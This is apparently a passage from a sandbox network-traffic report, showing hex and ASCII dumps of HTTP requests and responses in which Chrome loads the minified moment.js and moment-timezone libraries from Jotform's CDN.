                                                                                                                                                                                                                                            Data Ascii: eout(()=>r(e()),t)),c=async(e,t=3,r=10)=>{let n=async o=>{try{return await e()}catch(e){if(o<=t){let e=o+1;return u(()=>n(e),r)}return}};return n(1)},f=e=>{Object.keys(e).forEach(t=>{l[t]&&l[t].contains.includes(e[t])&&(e[t]=l[t].to),"object"==typeof e[t]
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6e 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 74 29 3b 72 65 74 75 72 6e 28 21 6e 26 26 72 26 26 28 6e 3d 61 77 61 69 74 20 63 28 28 29 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 2c 72 29 3d 3e 7b 6c 65 74 20 6e 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 74 29 3b 6e 26 26 28 74 68 69 73 2e 69 73 56 61 6c 75 65 56 61 6c 69 64 28 6e 29 3f 65 28 6e 29 3a 28 74 68 69 73 2e 63 61 63 68 65 2e 64 65 6c 65 74 65 28 74 29 2c 65 28 76 6f 69 64 20 30 29 29 29 2c 72 28 29 7d 29 2c 34 30 2c 35 30 29 29 2c 6e 26 26 74 68 69 73 2e 69 73 56 61 6c 75 65 56 61 6c 69 64 28 6e 29 29 3f 6e 2e 72 65 73 70 6f 6e 73 65 3a 28 74 68 69 73 2e 63 61 63 68 65 2e 64 65 6c 65 74 65 28 74 29 2c 6e 75 6c 6c 29 7d 72 65 6d 6f 76 65 28 65 29 7b 74 68 69 73 2e 63 61 63 68 65
                                                                                                                                                                                                                                            Data Ascii: n=this.cache.get(t);return(!n&&r&&(n=await c(()=>new Promise((e,r)=>{let n=this.cache.get(t);n&&(this.isValueValid(n)?e(n):(this.cache.delete(t),e(void 0))),r()}),40,50)),n&&this.isValueValid(n))?n.response:(this.cache.delete(t),null)}remove(e){this.cache
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 7d 29 7d 72 65 74 75 72 6e 20 65 7d 29 28 7b 7d 2c 74 2c 65 29 3b 63 6c 61 73 73 20 79 7b 72 75 6e 28 65 29 7b 74 68 69 73 2e 69 6e 74 65 72 63 65 70 74 6f 72 73 2e 66 6f 72 45 61 63 68 28 74 3d 3e 7b 74 28 65 29 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 76 61 72 20 74 2c 72 3b 72 3d 76 6f 69 64 20 30 2c 28 74 3d 22 69 6e 74 65 72 63 65 70 74 6f 72 73 22 29 69 6e 20 74 68 69 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c
                                                                                                                                                                                                                                            Data Ascii: fineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n})}return e})({},t,e);class y{run(e){this.interceptors.forEach(t=>{t(e)})}constructor(e){var t,r;r=void 0,(t="interceptors")in this?Object.defineProperty(this,t,{value:r,enumerabl


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            12192.168.2.1749715104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC569OUTGET /s/vendor/static/moment/2.29.4/moment-with-locales.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 369019
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:36:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 88
                                                                                                                                                                                                                                            last-modified: Thu, 12 Dec 2024 12:31:15 GMT
                                                                                                                                                                                                                                            etag: "d458b68730a7330653700489333a7837"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b65cda18c0-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC941INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 61 29 3a 65 2e 6d 6f 6d 65 6e 74 3d 61 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 45 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 29 7b 72 65 74 75 72 6e 20 45 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74
                                                                                                                                                                                                                                            Data Ascii: !function(e,a){"object"==typeof exports&&"undefined"!=typeof module?module.exports=a():"function"==typeof define&&define.amd?define(a):e.moment=a()}(this,function(){"use strict";var E;function M(){return E.apply(null,arguments)}function F(e){return e inst
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 65 5b 74 5d 3d 61 5b 74 5d 29 3b 72 65 74 75 72 6e 20 6c 28 61 2c 22 74 6f 53 74 72 69 6e 67 22 29 26 26 28 65 2e 74 6f 53 74 72 69 6e 67 3d 61 2e 74 6f 53 74 72 69 6e 67 29 2c 6c 28 61 2c 22 76 61 6c 75 65 4f 66 22 29 26 26 28 65 2e 76 61 6c 75 65 4f 66 3d 61 2e 76 61 6c 75 65 4f 66 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 61 2c 74 2c 73 29 7b 72 65 74 75 72 6e 20 46 61 28 65 2c 61 2c 74 2c 73 2c 21 30 29 2e 75 74 63 28 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 2e 5f 70 66 26 26 28 65 2e 5f 70 66 3d 7b 65 6d 70 74 79 3a 21 31 2c 75 6e 75 73 65 64 54 6f 6b 65 6e 73 3a 5b 5d 2c 75 6e 75 73 65 64 49 6e 70 75 74 3a 5b 5d 2c 6f 76 65 72 66 6c 6f 77 3a 2d 32 2c 63 68 61 72 73 4c 65 66 74 4f 76 65 72 3a
                                                                                                                                                                                                                                            Data Ascii: e[t]=a[t]);return l(a,"toString")&&(e.toString=a.toString),l(a,"valueOf")&&(e.valueOf=a.valueOf),e}function U(e,a,t,s){return Fa(e,a,t,s,!0).utc()}function h(e){return null==e._pf&&(e._pf={empty:!1,unusedTokens:[],unusedInput:[],overflow:-2,charsLeftOver:
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6d 3d 61 2e 5f 74 7a 6d 29 2c 64 28 61 2e 5f 69 73 55 54 43 29 7c 7c 28 65 2e 5f 69 73 55 54 43 3d 61 2e 5f 69 73 55 54 43 29 2c 64 28 61 2e 5f 6f 66 66 73 65 74 29 7c 7c 28 65 2e 5f 6f 66 66 73 65 74 3d 61 2e 5f 6f 66 66 73 65 74 29 2c 64 28 61 2e 5f 70 66 29 7c 7c 28 65 2e 5f 70 66 3d 68 28 61 29 29 2c 64 28 61 2e 5f 6c 6f 63 61 6c 65 29 7c 7c 28 65 2e 5f 6c 6f 63 61 6c 65 3d 61 2e 5f 6c 6f 63 61 6c 65 29 2c 30 3c 72 29 66 6f 72 28 74 3d 30 3b 74 3c 72 3b 74 2b 2b 29 64 28 6e 3d 61 5b 73 3d 4b 5b 74 5d 5d 29 7c 7c 28 65 5b 73 5d 3d 6e 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 5a 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 64 3d 6e 65 77 20 44 61 74 65 28 6e 75 6c 6c 21 3d 65 2e 5f 64 3f 65 2e 5f 64 2e 67 65 74 54 69 6d
                                                                                                                                                                                                                                            Data Ascii: m=a._tzm),d(a._isUTC)||(e._isUTC=a._isUTC),d(a._offset)||(e._offset=a._offset),d(a._pf)||(e._pf=h(a)),d(a._locale)||(e._locale=a._locale),0<r)for(t=0;t<r;t++)d(n=a[s=K[t]])||(e[s]=n);return e}function $(e){Z(this,e),this._d=new Date(null!=e._d?e._d.getTim
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 74 65 20 73 5b 74 5d 29 3b 66 6f 72 28 74 20 69 6e 20 65 29 6c 28 65 2c 74 29 26 26 21 6c 28 61 2c 74 29 26 26 7a 28 65 5b 74 5d 29 26 26 28 73 5b 74 5d 3d 49 28 7b 7d 2c 73 5b 74 5d 29 29 3b 72 65 74 75 72 6e 20 73 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 29 7b 6e 75 6c 6c 21 3d 65 26 26 74 68 69 73 2e 73 65 74 28 65 29 7d 4d 2e 73 75 70 70 72 65 73 73 44 65 70 72 65 63 61 74 69 6f 6e 57 61 72 6e 69 6e 67 73 3d 21 31 2c 4d 2e 64 65 70 72 65 63 61 74 69 6f 6e 48 61 6e 64 6c 65 72 3d 6e 75 6c 6c 3b 76 61 72 20 72 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 61 2c 74 3d 5b 5d 3b 66 6f 72 28 61 20 69 6e 20 65 29 6c 28 65 2c 61 29 26 26 74 2e 70 75 73 68 28 61 29 3b 72 65 74 75 72 6e 20 74 7d 3b 66 75 6e 63 74
                                                                                                                                                                                                                                            Data Ascii: te s[t]);for(t in e)l(e,t)&&!l(a,t)&&z(e[t])&&(s[t]=I({},s[t]));return s}function ne(e){null!=e&&this.set(e)}M.suppressDeprecationWarnings=!1,M.deprecationHandler=null;var re=Object.keys||function(e){var a,t=[];for(a in e)l(e,a)&&t.push(a);return t};funct
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 29 2c 5f 65 2e 6c 61 73 74 49 6e 64 65 78 3d 30 2c 2d 2d 74 3b 72 65 74 75 72 6e 20 65 7d 76 61 72 20 4d 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 61 29 7b 76 61 72 20 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 4d 65 5b 74 5d 3d 4d 65 5b 74 2b 22 73 22 5d 3d 4d 65 5b 61 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 4d 65 5b 65 5d 7c 7c 4d 65 5b 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3a 76 6f 69 64 20 30 7d 66 75 6e 63 74 69 6f 6e 20 68 65 28 65 29 7b 76 61 72 20 61 2c 74 2c 73 3d 7b 7d 3b 66 6f 72 28 74 20 69 6e 20 65 29 6c 28 65 2c 74 29 26 26 28 61 3d 69 28 74 29 29 26 26 28 73 5b 61 5d 3d 65 5b 74 5d 29 3b 72 65 74 75 72 6e 20 73 7d 76 61
                                                                                                                                                                                                                                            Data Ascii: ),_e.lastIndex=0,--t;return e}var Me={};function a(e,a){var t=e.toLowerCase();Me[t]=Me[t+"s"]=Me[a]=e}function i(e){return"string"==typeof e?Me[e]||Me[e.toLowerCase()]:void 0}function he(e){var a,t,s={};for(t in e)l(e,t)&&(a=i(t))&&(s[a]=e[t]);return s}va
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 28 5c 5b 29 7c 5c 5c 28 5c 5d 29 7c 5c 5b 28 5b 5e 5c 5d 5c 5b 5d 2a 29 5c 5d 7c 5c 5c 28 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 61 7c 7c 74 7c 7c 73 7c 7c 6e 7d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5c 2f 5c 5c 5e 24 2a 2b 3f 2e 28 29 7c 5b 5c 5d 7b 7d 5d 2f 67 2c 22 5c 5c 24 26 22 29 7d 76 61 72 20 48 65 3d 7b 7d 2c 76 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 29 7b 76 61 72 20 61 2c 73 2c 6e 3d 74 3b 66 6f 72 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 4a 28 74 29 26 26 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 61
                                                                                                                                                                                                                                            Data Ascii: ").replace(/\\(\[)|\\(\])|\[([^\]\[]*)\]|\\(.)/g,function(e,a,t,s,n){return a||t||s||n})))}function k(e){return e.replace(/[-\/\\^$*+?.()|[\]{}]/g,"\\$&")}var He={},ve={};function D(e,t){var a,s,n=t;for("string"==typeof e&&(e=[e]),J(t)&&(n=function(e,a){a
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 72 20 74 3b 69 66 28 65 2e 69 73 56 61 6c 69 64 28 29 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 61 29 69 66 28 2f 5e 5c 64 2b 24 2f 2e 74 65 73 74 28 61 29 29 61 3d 6d 28 61 29 3b 65 6c 73 65 20 69 66 28 21 4a 28 61 3d 65 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 6d 6f 6e 74 68 73 50 61 72 73 65 28 61 29 29 29 72 65 74 75 72 6e 3b 74 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 64 61 74 65 28 29 2c 7a 65 28 65 2e 79 65 61 72 28 29 2c 61 29 29 2c 65 2e 5f 64 5b 22 73 65 74 22 2b 28 65 2e 5f 69 73 55 54 43 3f 22 55 54 43 22 3a 22 22 29 2b 22 4d 6f 6e 74 68 22 5d 28 61 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 47 65 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 3f 28 55 65 28 74 68 69 73 2c 65 29 2c 4d 2e 75 70 64 61 74 65 4f 66 66 73
                                                                                                                                                                                                                                            Data Ascii: r t;if(e.isValid()){if("string"==typeof a)if(/^\d+$/.test(a))a=m(a);else if(!J(a=e.localeData().monthsParse(a)))return;t=Math.min(e.date(),ze(e.year(),a)),e._d["set"+(e._isUTC?"UTC":"")+"Month"](a,t)}}function Ge(e){return null!=e?(Ue(this,e),M.updateOffs
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 69 74 59 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6d 28 65 29 2b 28 36 38 3c 6d 28 65 29 3f 31 39 30 30 3a 32 65 33 29 7d 3b 76 61 72 20 4b 65 3d 59 65 28 22 46 75 6c 6c 59 65 61 72 22 2c 21 30 29 3b 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 2c 61 2c 74 2c 73 2c 6e 2c 72 2c 64 29 7b 76 61 72 20 69 3b 72 65 74 75 72 6e 20 65 3c 31 30 30 26 26 30 3c 3d 65 3f 28 69 3d 6e 65 77 20 44 61 74 65 28 65 2b 34 30 30 2c 61 2c 74 2c 73 2c 6e 2c 72 2c 64 29 2c 69 73 46 69 6e 69 74 65 28 69 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 29 26 26 69 2e 73 65 74 46 75 6c 6c 59 65 61 72 28 65 29 29 3a 69 3d 6e 65 77 20 44 61 74 65 28 65 2c 61 2c 74 2c 73 2c 6e 2c 72 2c 64 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 76 61 72 20 61 3b 72 65
                                                                                                                                                                                                                                            Data Ascii: itYear=function(e){return m(e)+(68<m(e)?1900:2e3)};var Ke=Ye("FullYear",!0);function qe(e,a,t,s,n,r,d){var i;return e<100&&0<=e?(i=new Date(e+400,a,t,s,n,r,d),isFinite(i.getFullYear())&&i.setFullYear(e)):i=new Date(e,a,t,s,n,r,d),i}function Ze(e){var a;re
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 68 6f 72 74 28 74 68 69 73 2c 65 29 7d 29 2c 73 28 22 64 64 64 64 22 2c 30 2c 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 77 65 65 6b 64 61 79 73 28 74 68 69 73 2c 65 29 7d 29 2c 73 28 22 65 22 2c 30 2c 30 2c 22 77 65 65 6b 64 61 79 22 29 2c 73 28 22 45 22 2c 30 2c 30 2c 22 69 73 6f 57 65 65 6b 64 61 79 22 29 2c 61 28 22 64 61 79 22 2c 22 64 22 29 2c 61 28 22 77 65 65 6b 64 61 79 22 2c 22 65 22 29 2c 61 28 22 69 73 6f 57 65 65 6b 64 61 79 22 2c 22 45 22 29 2c 74 28 22 64 61 79 22 2c 31 31 29 2c 74 28 22 77 65 65 6b 64 61 79 22 2c 31 31 29 2c 74 28 22 69 73 6f 57 65 65 6b 64 61 79 22 2c 31 31 29 2c 70 28 22 64 22 2c 6f 29 2c 70 28 22 65 22 2c 6f 29 2c 70 28 22 45 22 2c 6f 29 2c 70 28
                                                                                                                                                                                                                                            Data Ascii: hort(this,e)}),s("dddd",0,0,function(e){return this.localeData().weekdays(this,e)}),s("e",0,0,"weekday"),s("E",0,0,"isoWeekday"),a("day","d"),a("weekday","e"),a("isoWeekday","E"),t("day",11),t("weekday",11),t("isoWeekday",11),p("d",o),p("e",o),p("E",o),p(
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 70 28 22 5e 28 22 2b 6e 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2c 22 69 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 6f 75 72 73 28 29 25 31 32 7c 7c 31 32 7d 66 75 6e 63 74 69 6f 6e 20 6d 61 28 65 2c 61 29 7b 73 28 65 2c 30 2c 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 63 61 6c 65 44 61 74 61 28 29 2e 6d 65 72 69 64 69 65 6d 28 74 68 69 73 2e 68 6f 75 72 73 28 29 2c 74 68 69 73 2e 6d 69 6e 75 74 65 73 28 29 2c 61 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 61 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 6d 65 72 69 64 69 65 6d 50 61 72 73 65 7d 73 28 22 48 22 2c 5b 22 48 48 22 2c 32 5d 2c 30 2c 22 68 6f 75 72 22 29 2c 73 28 22 68 22 2c 5b 22 68 68 22 2c 32 5d 2c 30 2c
                                                                                                                                                                                                                                            Data Ascii: p("^("+n.join("|")+")","i")}function oa(){return this.hours()%12||12}function ma(e,a){s(e,0,0,function(){return this.localeData().meridiem(this.hours(),this.minutes(),a)})}function ua(e,a){return a._meridiemParse}s("H",["HH",2],0,"hour"),s("h",["hh",2],0,


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            13192.168.2.1749716172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC584OUTGET /s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn02.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 780925
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 12:48:19 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            Age: 88
                                                                                                                                                                                                                                            last-modified: Thu, 26 Dec 2024 11:09:36 GMT
                                                                                                                                                                                                                                            etag: "a6604abaadcf1a25a434a312ae70e0ed"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b659fd0f51-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC941INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 4d 2c 7a 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 7a 28 72 65 71 75 69 72 65 28 22 6d 6f 6d 65 6e 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6d 6f 6d 65 6e 74 22 5d 2c 7a 29 3a 7a 28 4d 2e 6d 6f 6d 65 6e 74 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 4f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 6f 69 64 20 30 3d 3d 3d 4f 2e 76 65 72 73 69 6f 6e 26 26 4f 2e 64 65 66 61 75 6c 74 26 26 28 4f 3d 4f 2e 64 65 66 61 75 6c 74 29 3b 76 61 72 20
                                                                                                                                                                                                                                            Data Ascii: !function(M,z){"use strict";"object"==typeof module&&module.exports?module.exports=z(require("moment")):"function"==typeof define&&define.amd?define(["moment"],z):z(M.moment)}(this,function(O){"use strict";void 0===O.version&&O.default&&(O=O.default);var
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 2c 41 3d 62 2e 6c 65 6e 67 74 68 2c 63 3d 30 3b 63 3c 41 3b 63 2b 2b 29 4f 5b 63 5d 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 28 4f 5b 63 2d 31 5d 7c 7c 30 29 2b 36 65 34 2a 4f 5b 63 5d 29 3b 72 65 74 75 72 6e 20 4f 5b 41 2d 31 5d 3d 31 2f 30 2c 7b 6e 61 6d 65 3a 4d 5b 30 5d 2c 61 62 62 72 73 3a 4c 28 4d 5b 31 5d 2e 73 70 6c 69 74 28 22 20 22 29 2c 62 29 2c 6f 66 66 73 65 74 73 3a 4c 28 7a 2c 62 29 2c 75 6e 74 69 6c 73 3a 70 2c 70 6f 70 75 6c 61 74 69 6f 6e 3a 30 7c 4d 5b 35 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 4d 29 7b 4d 26 26 74 68 69 73 2e 5f 73 65 74 28 6e 28 4d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 4d 2c 7a 29 7b 74 68 69 73 2e 6e 61 6d 65 3d 4d 2c 74 68 69 73 2e 7a 6f 6e 65 73 3d 7a 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 4d 29 7b 76 61 72 20 7a 3d
                                                                                                                                                                                                                                            Data Ascii: ,A=b.length,c=0;c<A;c++)O[c]=Math.round((O[c-1]||0)+6e4*O[c]);return O[A-1]=1/0,{name:M[0],abbrs:L(M[1].split(" "),b),offsets:L(z,b),untils:p,population:0|M[5]}}function f(M){M&&this._set(n(M))}function B(M,z){this.name=M,this.zones=z}function N(M){var z=
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 68 61 74 20 64 61 74 61 20 6c 6f 61 64 65 64 2e 22 29 7d 7d 63 61 74 63 68 28 4d 29 7b 7d 66 6f 72 28 76 61 72 20 62 2c 70 2c 4f 3d 69 28 29 2c 41 3d 4f 2e 6c 65 6e 67 74 68 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 66 6f 72 28 76 61 72 20 7a 2c 62 2c 70 3d 4d 2e 6c 65 6e 67 74 68 2c 4f 3d 7b 7d 2c 41 3d 5b 5d 2c 63 3d 30 3b 63 3c 70 3b 63 2b 2b 29 66 6f 72 28 7a 20 69 6e 20 62 3d 52 5b 4d 5b 63 5d 2e 6f 66 66 73 65 74 5d 7c 7c 7b 7d 29 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 7a 29 26 26 28 4f 5b 7a 5d 3d 21 30 29 3b 66 6f 72 28 63 20 69 6e 20 4f 29 4f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 26 26 41 2e 70 75 73 68 28 64 5b 63 5d 29 3b 72 65 74 75 72 6e 20 41 7d 28 4f 29 2c 71 3d 5b 5d 2c 6f 3d 30 3b 6f 3c 63 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                            Data Ascii: hat data loaded.")}}catch(M){}for(var b,p,O=i(),A=O.length,c=function(M){for(var z,b,p=M.length,O={},A=[],c=0;c<p;c++)for(z in b=R[M[c].offset]||{})b.hasOwnProperty(z)&&(O[z]=!0);for(c in O)O.hasOwnProperty(c)&&A.push(d[c]);return A}(O),q=[],o=0;o<c.lengt
